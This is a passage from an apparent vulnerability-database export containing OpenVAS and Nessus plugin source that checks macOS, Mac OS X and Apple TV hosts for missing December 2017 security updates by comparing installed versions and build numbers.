"EULEROS_SA-2017-1287.NASL", "EULEROS_SA-2017-1288.NASL", "EULEROS_SA-2020-1568.NASL", "EULEROS_SA-2021-2542.NASL", "EULEROS_SA-2021-2566.NASL", "FEDORA_2017-55A3247CFD.NASL", "FEDORA_2017-601B4C20A4.NASL", "FEDORA_2017-7F30914972.NASL", "FEDORA_2017-A52F252521.NASL", "FEDORA_2017-DBEC196DD8.NASL", "FEDORA_2017-EA44F172E3.NASL", "FREEBSD_PKG_76B085E29D3311E79260000C292EE6B8.NASL", "FREEBSD_PKG_9442A811DAB311E7B5AFA4BADB2F4699.NASL", "FREEBSD_PKG_CCACE707A8D811E7AC58B499BAEBFEAF.NASL", "GENTOO_GLSA-201710-32.NASL", "GENTOO_GLSA-201712-03.NASL", "GENTOO_GLSA-201712-04.NASL", "GENTOO_GLSA-201801-03.NASL", "GOOGLE_CHROME_63_0_3239_84.NASL", "MACOSX_GOOGLE_CHROME_63_0_3239_84.NASL", "MACOSX_SECUPD2017-005.NASL", "MACOS_10_13_2.NASL", "OPENSUSE-2017-1083.NASL", "OPENSUSE-2017-1200.NASL", "OPENSUSE-2017-1324.NASL", "OPENSUSE-2017-1349.NASL", "OPENSUSE-2018-116.NASL", "OPENSUSE-2018-389.NASL", "OPENSUSE-2018-5.NASL", "ORACLELINUX_ELSA-2017-2882.NASL", "ORACLELINUX_ELSA-2017-2972.NASL", "ORACLE_ENTERPRISE_MANAGER_APR_2018_CPU.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2018_CPU.NASL", "REDHAT-RHSA-2017-2882.NASL", "REDHAT-RHSA-2017-2972.NASL", "REDHAT-RHSA-2017-3193.NASL", "REDHAT-RHSA-2017-3194.NASL", "REDHAT-RHSA-2017-3195.NASL", "REDHAT-RHSA-2017-3401.NASL", "REDHAT-RHSA-2017-3476.NASL", "REDHAT-RHSA-2017-3477.NASL", "SECURITYCENTER_OPENSSL_1_0_2M.NASL", "SLACKWARE_SSA_2017-261-01.NASL", "SLACKWARE_SSA_2017-279-01.NASL", "SL_20171011_HTTPD_ON_SL7_X.NASL", "SL_20171019_HTTPD_ON_SL6_X.NASL", "SUSE_SU-2017-2542-1.NASL", "SUSE_SU-2017-2718-1.NASL", "SUSE_SU-2017-2756-1.NASL", "SUSE_SU-2017-2831-1.NASL", "SUSE_SU-2017-2981-1.NASL", "SUSE_SU-2017-3169-1.NASL", "SUSE_SU-2017-3176-1.NASL", "UBUNTU_USN-3425-1.NASL", "UBUNTU_USN-3441-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108252", "OPENVAS:1361412562310703980", "OPENVAS:1361412562310703992", "OPENVAS:1361412562310704150", "OPENVAS:1361412562310811719", "OPENVAS:1361412562310811720", "OPENVAS:1361412562310812045", "OPENVAS:1361412562310812235", "OPENVAS:1361412562310812236", "OPENVAS:1361412562310812237", "OPENVAS:1361412562310843313", "OPENVAS:1361412562310843360", "OPENVAS:1361412562310851660", "OPENVAS:1361412562310851734", "OPENVAS:1361412562310873446", "OPENVAS:1361412562310873507", "OPENVAS:1361412562310873627", "OPENVAS:1361412562310873748", "OPENVAS:1361412562310873785", "OPENVAS:1361412562310873829", "OPENVAS:1361412562310873837", "OPENVAS:1361412562310873974", "OPENVAS:1361412562310873977", "OPENVAS:1361412562310874436", "OPENVAS:1361412562310874598", "OPENVAS:1361412562310882791", "OPENVAS:1361412562311220201568"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2018"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2882", "ELSA-2017-2972"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145363", "PACKETSTORM:145364", "PACKETSTORM:145876"]}, {"type": "photon", "idList": ["PHSA-2017-0002", "PHSA-2017-0045"]}, {"type": "redhat", "idList": ["RHSA-2017:2882", "RHSA-2017:3194"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-1000254", "RH:CVE-2017-15422", "RH:CVE-2017-3735"]}, {"type": "seebug", "idList": ["SSV:96537", "SSV:96986", "SSV:96988", "SSV:96989", "SSV:96990"]}, {"type": "slackware", "idList": ["SSA-2017-261-01", "SSA-2017-279-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:3244-1", "OPENSUSE-SU-2017:3245-1", "OPENSUSE-SU-2018:1057-1", "SUSE-SU-2017:2968-1", "SUSE-SU-2017:2981-1"]}, {"type": "symantec", "idList": ["SMNTC-1423", "SMNTC-1457"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A5BD476BF79F7E3854840596F916518C"]}, {"type": "ubuntu", "idList": ["USN-3441-2", "USN-3611-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-1000254", "UB:CVE-2017-15422", "UB:CVE-2017-3735", "UB:CVE-2017-9798"]}, {"type": "zdi", "idList": ["ZDI-17-925"]}, {"type": "zdt", "idList": ["1337DAY-ID-28593", "1337DAY-ID-28596", "1337DAY-ID-29200"]}]}, "exploitation": null, "vulnersScore": 0.5}, "pluginID": "1361412562310812401", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_macosx_HT208331_02.nasl 14295 2019-03-18 20:16:46Z cfischer $\n#\n# Apple MacOSX Security Updates(HT208331)-02\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812401\");\n script_version(\"$Revision: 14295 $\");\n script_cve_id(\"CVE-2017-13868\", \"CVE-2017-13869\", \"CVE-2017-3735\", \"CVE-2017-13855\",\n\t\t\"CVE-2017-13844\", \"CVE-2017-9798\", \"CVE-2017-13847\", \"CVE-2017-13833\",\n\t\t\"CVE-2017-10002\", \"CVE-2017-13867\", \"CVE-2017-13862\", \"CVE-2017-7172\",\n \"CVE-2017-1000254\", \"CVE-2017-15422\", \"CVE-2017-7159\", \"CVE-2017-7162\",\n \"CVE-2017-13904\", \"CVE-2017-7173\", \"CVE-2017-7154\");\n script_bugtraq_id(100515, 100872, 101946);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 21:16:46 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 10:51:36 +0530 (Thu, 07 Dec 2017)\");\n script_name(\"Apple MacOSX Security Updates(HT208331)-02\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Security update includes,\n\n - A validation issue was addressed with improved input sanitization.\n\n - An out-of-bounds read issue existed in X.509 IPAddressFamily parsing.\n\n - A type confusion issue was addressed with improved memory handling.\n\n - A memory corruption issue was addressed with improved memory handling.\n\n - Multiple issues were addressed by updating to version 2.4.28.\n\n - Multiple memory corruption issues were addressed through improved state management.\n\n - An out-of-bounds read was addressed with improved bounds checking.\n\n - An out-of-bounds read issue existed in the FTP PWD response parsing.\n\n - An integer overflow error.\n\n - An input validation issue existed in the kernel.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to read restricted memory, execute arbitrary code with system\n privileges.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions,\n 10.13.x through 10.13.1, 10.12.x through 10.12.6, 10.11.x through 10.11.6\");\n\n script_tag(name:\"solution\", value:\"Apply the appropriate security patch from\n the reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[1-3]\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[1-3]\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nbuildVer = get_kb_item(\"ssh/login/osx_build\");\n\nif(osVer =~ \"^10\\.11\")\n{\n if(version_in_range(version:osVer, test_version:\"10.11\", test_version2:\"10.11.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.11.6\")\n {\n if(osVer == \"10.11.6\" && version_is_less(version:buildVer, test_version:\"15G18013\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nif(osVer =~ \"^10\\.12\")\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.12.6\")\n {\n if(osVer == \"10.12.6\" && version_is_less(version:buildVer, test_version:\"16G1114\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nelse if(osVer == \"10.13.1\"){\n fix = \"10.13.2\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "naslFamily": "Mac OS X Local Security Checks", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660032824, "score": 1660035103}, "_internal": {"score_hash": "edf4ccda02b629417a4e9bbd357887af"}}

{"nessus": [{"lastseen": "2021-10-16T13:26:22", "description": "The remote host is running Mac OS X 10.11.6 or Mac OS X 10.12.6 and is missing a security update. It is therefore, affected by multiple vulnerabilities affecting the following components :\n\n - apache\n - curl\n - IOAcceleratorFamily\n - IOKit\n - Kernel\n - OpenSSL\n - Screen Sharing Server", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "type": "nessus", "title": "macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3735", "CVE-2017-7154", "CVE-2017-7158", "CVE-2017-7159", "CVE-2017-7162", "CVE-2017-7172", "CVE-2017-7173", "CVE-2017-9798", "CVE-2017-12837", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13862", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13872", "CVE-2017-13904", "CVE-2017-15422", "CVE-2017-1000254"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOSX_SECUPD2017-005.NASL", "href": "https://www.tenable.com/plugins/nessus/105081", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105081);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-3735\",\n \"CVE-2017-7154\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\",\n \"CVE-2017-12837\",\n \"CVE-2017-13847\",\n \"CVE-2017-13855\",\n \"CVE-2017-13862\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13872\",\n \"CVE-2017-13904\",\n \"CVE-2017-15422\",\n \"CVE-2017-1000254\"\n );\n script_bugtraq_id(\n 100515,\n 100860,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102100,\n 103134,\n 103135\n );\n\n script_name(english:\"macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)\");\n script_summary(english:\"Checks for the presence of Security Update 2017-002 / 2017-005.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS or Mac OS X security update that\nfixes multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Mac OS X 10.11.6 or Mac OS X 10.12.6 and is\nmissing a security update. It is therefore, affected by multiple\nvulnerabilities affecting the following components :\n\n - apache\n - curl\n - IOAcceleratorFamily\n - IOKit\n - Kernel\n - OpenSSL\n - Screen Sharing Server\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2017-005 or later for 10.11.x or\nSecurity Update 2017-002 or later for 10.12.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item_or_exit(\"Host/MacOSX/Version\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(11\\.6|12\\.6)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, \"Mac OS X 10.11.6 or Mac OS X 10.12.6\");\n\nif (\"10.11.6\" >< os)\n patch = \"2017-005\";\nelse\n patch = \"2017-002\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = pgrep(\n pattern:\"^com\\.apple\\.pkg\\.update\\.(security\\.|os\\.SecUpd).*bom$\",\n string:packages\n);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = pregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:11", "description": "The remote host is running a version of macOS that is 10.13.x prior to 10.13.2. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-10T00:00:00", "type": "nessus", "title": "macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754", "CVE-2017-3735", "CVE-2017-9798", "CVE-2017-1000254", "CVE-2017-13871", "CVE-2017-13860", "CVE-2017-13833", "CVE-2017-13826", "CVE-2017-13847", "CVE-2017-7162", "CVE-2017-13862", "CVE-2017-13867", "CVE-2017-13876", "CVE-2017-13855", "CVE-2017-13865", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-7154", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-7155", "CVE-2017-7163", "CVE-2017-13878", "CVE-2017-13875", "CVE-2017-7159", "CVE-2017-13848", "CVE-2017-13858", "CVE-2017-7158", "CVE-2017-13844"], "modified": "2019-04-10T00:00:00", "cpe": ["cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*"], "id": "700513.PRM", "href": "https://www.tenable.com/plugins/nnm/700513", "sourceData": "Binary data 700513.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:35:37", "description": "The remote host is running a version of Mac OS X that is 10.13.x prior to 10.13.2. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "type": "nessus", "title": "macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254", "CVE-2017-13847", "CVE-2017-13848", "CVE-2017-13855", "CVE-2017-13858", "CVE-2017-13860", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13871", "CVE-2017-13872", "CVE-2017-13875", "CVE-2017-13876", "CVE-2017-13878", "CVE-2017-13883", "CVE-2017-13886", "CVE-2017-13887", "CVE-2017-13892", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-3735", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7154", "CVE-2017-7155", "CVE-2017-7158", "CVE-2017-7159", "CVE-2017-7162", "CVE-2017-7163", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173", "CVE-2017-9798"], "modified": "2019-06-19T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_10_13_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105080", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105080);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2017-1000254\",\n \"CVE-2017-13847\",\n \"CVE-2017-13848\",\n \"CVE-2017-13855\",\n \"CVE-2017-13858\",\n \"CVE-2017-13860\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13871\",\n \"CVE-2017-13872\",\n \"CVE-2017-13875\",\n \"CVE-2017-13876\",\n \"CVE-2017-13878\",\n \"CVE-2017-13883\",\n \"CVE-2017-13886\",\n \"CVE-2017-13887\",\n \"CVE-2017-13892\",\n \"CVE-2017-13904\",\n \"CVE-2017-13905\",\n \"CVE-2017-13911\",\n \"CVE-2017-15422\",\n \"CVE-2017-3735\",\n \"CVE-2017-5754\",\n \"CVE-2017-7151\",\n \"CVE-2017-7154\",\n \"CVE-2017-7155\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7163\",\n \"CVE-2017-7171\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\"\n );\n script_bugtraq_id(\n 100515,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102099,\n 102100,\n 102378,\n 103134,\n 103135\n );\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208394\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.13.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nfixed_version = \"10.13.2\";\n\nif (version !~\"^10\\.13($|[^0-9])\")\n audit(AUDIT_OS_NOT, \"macOS 10.13.x\");\n\nif (ver_compare(ver:version, fix:'10.13.2', strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T01:00:28", "description": "According to its banner, the version of Apple TV on the remote device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-05T00:00:00", "type": "nessus", "title": "Apple TV < 11.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-13833", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13876"], "modified": "2019-06-04T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_11_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105612", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105612);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/06/04 9:45:00\");\n\n script_cve_id(\n \"CVE-2017-7154\",\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-7162\",\n \"CVE-2017-13833\",\n \"CVE-2017-13855\",\n \"CVE-2017-13856\",\n \"CVE-2017-13861\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13866\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13870\",\n \"CVE-2017-13876\"\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-12-6-4\");\n\n script_name(english:\"Apple TV < 11.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 11.2. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208327\");\n # https://seclists.org/fulldisclosure/2017/Dec/29\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?262ee1b8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 11.2 or later. Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7162\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Webkit Proxy Object Type Confusion');\n 